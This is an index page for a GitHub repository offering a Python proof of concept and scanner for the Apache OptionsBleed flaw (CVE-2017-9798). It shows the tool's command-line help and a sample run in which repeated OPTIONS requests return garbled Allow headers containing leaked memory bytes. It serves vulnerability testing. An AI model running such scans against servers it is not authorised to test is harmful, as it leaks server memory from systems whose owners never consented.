Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/brokensound77/optionsbleed-poc-scanner
OptionsBleed (CVE-2017-9798) PoC / Scanner
https://github.com/brokensound77/optionsbleed-poc-scanner
apache cve-2017-9798 optionsbleed poc scanner
Last synced: 24 days ago
JSON representation
OptionsBleed (CVE-2017-9798) PoC / Scanner
- Host: GitHub
- URL: https://github.com/brokensound77/optionsbleed-poc-scanner
- Owner: brokensound77
- License: mit
- Created: 2017-09-27T03:28:22.000Z (about 7 years ago)
- Default Branch: master
- Last Pushed: 2024-05-21T05:25:02.000Z (6 months ago)
- Last Synced: 2024-10-08T13:12:22.194Z (about 1 month ago)
- Topics: apache, cve-2017-9798, optionsbleed, poc, scanner
- Language: Python
- Homepage:
- Size: 14.6 KB
- Stars: 18
- Watchers: 3
- Forks: 4
- Open Issues: 4
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# OptionsBleed-POC-Scanner
OptionsBleed (CVE-2017-9798) PoC / ScannerMore information coming soon...
## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.## Usage
`pip install -r requirements.txt`
```
usage: bleeder.py [-h] [-c COUNT] [-f {option,custom}] [-tc THREAD_COUNT] [-nv] [-ni] [-v] [-e] urlpositional arguments:
url full URL (including http(s)) to be scannedoptional arguments:
-h, --help show this help message and exit
-c COUNT, --count COUNT
number of times to scan (default: 1000)
-f {option,custom}, --force {option,custom}
forces the scan to attempt using custom verb method
OR OPTIONS (default: try OPTIONS THEN custom)
-tc THREAD_COUNT, --thread-count THREAD_COUNT
max concurrent thread count (default: 500)
-nv, --no-verify does not verify ssl connection (may be necessary for
self-signed certs)
-ni, --no-ignore does NOT ignore ssl warnings (default: ignored)
-v, --verbose prints all headers
-e, --errors prints all errors
```## Simple Usage
```console
python bleeder.py "http://10.1.2.3" -c 50::OptionsBleed (CVE-2017-9798) Scanner::
[+] scanning http://10.1.2.3 to see if it bleeds!
[+] checking OPTION method
[+] allow headers detected in OPTION response
[+] checking CUSTOM method
[+] allow headers detected in CUSTOM response
[+] scanning with OPTIONS method...
[+] scanning with custom (PULL) method...
[+] 50 responses captured
[+] unique results:
GET,HEAD,allow,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,
GET,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,
GET,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
GET,HEAD,allow,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,all,HEAD,
GET,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD,all,HEAD
GET,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,OPTIONS,POST,,HEAD,all,HEAD,,HEAD,
GET,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD
GET,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,all,HEAD,
GET,HEAD,allow,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD
GET,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
GET,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
GET,HEAD,allow,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,OPTIONS,POST,,HEAD,all,HEAD,,HEAD,
[+] scan complete!
```